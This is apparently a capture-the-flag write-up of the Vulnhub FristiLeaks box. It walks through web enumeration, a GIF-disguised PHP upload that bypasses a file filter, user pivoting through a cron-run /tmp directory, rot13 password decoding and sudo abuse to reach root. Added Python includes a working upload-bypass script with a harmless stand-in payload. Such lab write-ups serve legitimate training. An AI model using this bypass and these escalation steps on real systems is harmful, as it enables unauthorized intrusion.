Vulnhub virtual machine; OSCP prep box, and a very interesting one indeed. This box included a few hints and clues sprinkled around a web application, which then pivoted to multiple user escalations alongside decryption of ciphertext, which led to eventual root.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Initial Setup Note: When booting this VM, ensure your virtualization software uses the MAC address
08:00:27:A5:A6:76. I probably spent way more time than I’d like to admit troubleshooting networking issues, far more than I really should have. #fundamentalsofreading
Discover VM on network:
robots.txt looks to have some interesting directories disallowed
Navigate to webserver:
Not my favorite color, but we have a list of user names and a date of 2015.
Might be helpful in the future.
First clue: the goal is root, and the box is estimated at 4 hours to complete.
Investigate the robots.txt disallowed directories, starting with http://192.168.56.109/cola
Download the image locally to investigate for steganography.
Nothing such as an embedded .zip or similar is standing out so far.
/cola/ and /beer/ both contain links to the same image.
Since all of these directories are named after some type of drink, and we were told to “keep calm and drink fristi”, maybe a /fristi/ directory exists.
Attempt basic logins first (admin/admin, root/password, etc.).
Met with a whole lot of “wrong username or password”.
Content filtering is in place; good job, webadmin.
Well hello, base64-encoded image.
Decode the base64: save the blob to a file, then decode it.
The decoded file has a PNG header, so pipe the decoded output into a .png file.
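The same decode-and-sniff step in Python, as an added example rather than code from the original write-up. It strips the whitespace and line breaks that a blob copied out of a web page usually carries, decodes strictly so a mangled paste fails loudly instead of producing a corrupt file, and names the output after whatever magic bytes turn up. The sample blob is constructed for the example (it is only the 8-byte PNG signature, not the image from the box), and the output path is an assumption.

```python
import base64
import re

# Constructed sample (not the blob from the box): base64 of the 8-byte PNG
# signature, split across lines and padded with whitespace the way text
# copied out of an HTML comment usually arrives.
SAMPLE_B64 = """
iVBOR
w0KGgo=
"""

# Leading magic bytes -> file type, for the formats a pentester meets most often.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"PK\x03\x04", "zip"),
]


def decode_blob(text: str) -> bytes:
    """Strip all whitespace and strictly base64-decode the blob.

    validate=True makes b64decode reject characters outside the base64
    alphabet instead of silently dropping them, so a bad copy-paste raises
    binascii.Error rather than yielding a subtly corrupt file.
    """
    cleaned = re.sub(r"\s+", "", text)
    return base64.b64decode(cleaned, validate=True)


def sniff(data: bytes) -> str:
    """Return the file type implied by the leading magic bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def decode_to_file(text: str, path: str) -> str:
    """Decode the blob, pick an extension from its magic bytes, write it out."""
    data = decode_blob(text)
    kind = sniff(data)
    with open(f"{path}.{kind}", "wb") as fh:
        fh.write(data)
    return kind


if __name__ == "__main__":
    # Assumed output location for the demo.
    kind = decode_to_file(SAMPLE_B64, "/tmp/decoded")
    print(f"decoded {kind} written to /tmp/decoded.{kind}")
```

The magic-byte check is the part worth keeping: base64 text gives no hint of what it encodes, and the same helper tells you whether the next blob you find is an image, an archive, or something else entirely.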
Well this is turning into a bit of a Drake “keke” song.
The image resolves to
eezeepz was the one who left the message, so let’s try to log in with that name.
We are in like fine swimwear! The page offers a PHP-based file upload, so let’s try to upload a reverse shell.
Attempt to upload shell.php:
We will need to disguise our shell as an image.
Changed the file name and Content-Type, and prepended the GIF89a; magic bytes.
File filter bypassed and uploaded to
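An added example (not the write-up’s own code) of the three changes above done programmatically: the PHP is prefixed with the GIF89a; signature, the multipart body is built by hand so the file name and Content-Type header are exactly what we choose, and a defender-side check shows why the trick works and how to catch it. The file name shell.php.gif, the form field name, the upload URL, and the harmless phpinfo() stand-in for the reverse shell are all assumptions for the demo.

```python
import sys
import urllib.request
import uuid

# Constructed stand-in for the reverse shell: any PHP goes here, phpinfo()
# is used so the demo is harmless.
PHP_PAYLOAD = b"<?php phpinfo(); ?>"

IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")


def disguise_as_gif(php: bytes) -> bytes:
    """Prepend the GIF89a; signature. Magic-byte sniffers see a GIF, while
    the PHP interpreter ignores everything outside <?php ... ?> tags, so
    the code after the header still runs if the server executes the file."""
    return b"GIF89a;" + php


def build_multipart(field: str, filename: str, content_type: str,
                    data: bytes, boundary: str = "") -> tuple:
    """Hand-build a multipart/form-data body. The filename and Content-Type
    in the part header are what a naive upload filter inspects, so both are
    set explicitly. Returns (body, value for the request Content-Type)."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail, f"multipart/form-data; boundary={boundary}"


def upload(url: str, body: bytes, content_type: str) -> int:
    """POST the body with the standard library; returns the HTTP status."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", content_type)
    with urllib.request.urlopen(req) as resp:
        return resp.status


def is_polyglot(data: bytes) -> bool:
    """Defender-side check: an upload whose magic bytes say 'image' but whose
    body carries a PHP open tag is a web shell in costume. Checking magic
    bytes alone is exactly the weakness the disguise above exploits."""
    looks_like_image = data.startswith(IMAGE_MAGIC)
    has_php = b"<?php" in data or b"<?=" in data
    return looks_like_image and has_php


if __name__ == "__main__":
    # Assumed names: form field "file", file name shell.php.gif.
    body, ctype = build_multipart("file", "shell.php.gif", "image/gif",
                                  disguise_as_gif(PHP_PAYLOAD))
    print(body.decode(errors="replace"))
    if len(sys.argv) > 1:  # pass the assumed upload URL to actually send it
        print("status:", upload(sys.argv[1], body, ctype))
```

Only send this at a target you are authorized to test. The fix on the server side is the mirror image of the bypass: decide by a server-side allow-list of extensions, store uploads outside the web root or with execution disabled, and reject any “image” that contains script tags.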
Ensure the listener is set up:
Upgrade the partial shell to a full TTY using the Python method:
Start enumerating the box to elevate privileges.
Search for vulnerabilities against the 2.6.32 kernel:
Looks like we found some privesc code... and this has turned out not to be helpful.
Running my enum scripts:
Interesting avenues to take.
Continue enumerating user home directories: found a note.txt in eezeepz’s home.
Jerry left this note: files added to /tmp/run get run as his account.
Let’s drop a reverse shell into that directory and see if we can elevate our privileges to jerry.
Made the modifications needed:
Set up a new listener on 9001:
Download the script to
Append the Perl script to a new file name:
We are now admin.
Import a new TTY:
As in our previous encounter, the home directory aided our escalation, so let’s investigate this one.
Interesting files exist here:
Cat the interesting files:
Based on the Python script, the passwords seem to be encoded with rot13.
Reconstruct cryptpass.py in reverse to decode them:
Run the script:
We now have plaintext passwords.
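The reverse of the encoder, as an added example (not the write-up’s reconstructed script). It assumes the encoder applies base64, then reverses the string, then rot13; the decoder simply undoes those steps in the opposite order, and the test values below are constructed for the example rather than taken from the box. The point worth noticing is the ordering: rot13 is its own inverse, but if you forget the reversal the base64 padding ends up at the front and decoding fails.

```python
import base64
import binascii
import codecs


def encode_string(plaintext: str) -> str:
    """Assumed encoder: base64 -> reverse the string -> rot13."""
    b64 = base64.b64encode(plaintext.encode()).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(ciphertext: str) -> str:
    """Undo the steps in reverse order: rot13 (self-inverse) -> reverse ->
    base64 decode. rot13 only touches letters, so '=', '+' and '/' survive."""
    b64 = codecs.encode(ciphertext, "rot13")[::-1]
    return base64.b64decode(b64).decode()


def try_decode(ciphertext: str):
    """Decode one value, returning None instead of raising when the input is
    not valid output of the encoder (wrong order of steps, or not this scheme)."""
    try:
        return decode_string(ciphertext)
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_lines(text: str) -> dict:
    """Decode a file of one ciphertext per line; maps ciphertext -> plaintext
    (None where a line does not decode), keeping blank lines out."""
    return {line.strip(): try_decode(line.strip())
            for line in text.splitlines() if line.strip()}


if __name__ == "__main__":
    # Constructed sample, not the file from the box.
    sample = "\n".join(encode_string(p) for p in ("test", "Fristi2015!"))
    for ct, pt in decode_lines(sample).items():
        print(f"{ct} -> {pt}")
```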
Utilizing the password to su to fristigod:
Run sudo -l to see what fristigod is capable of doing:
We have a *.secret_admin_stuff/doCom* file which looks very interesting.
We see a lot of movement pertaining to a user
Attempt to run doCom as
doCom as the usage indicates, but calling
Bring me the Root!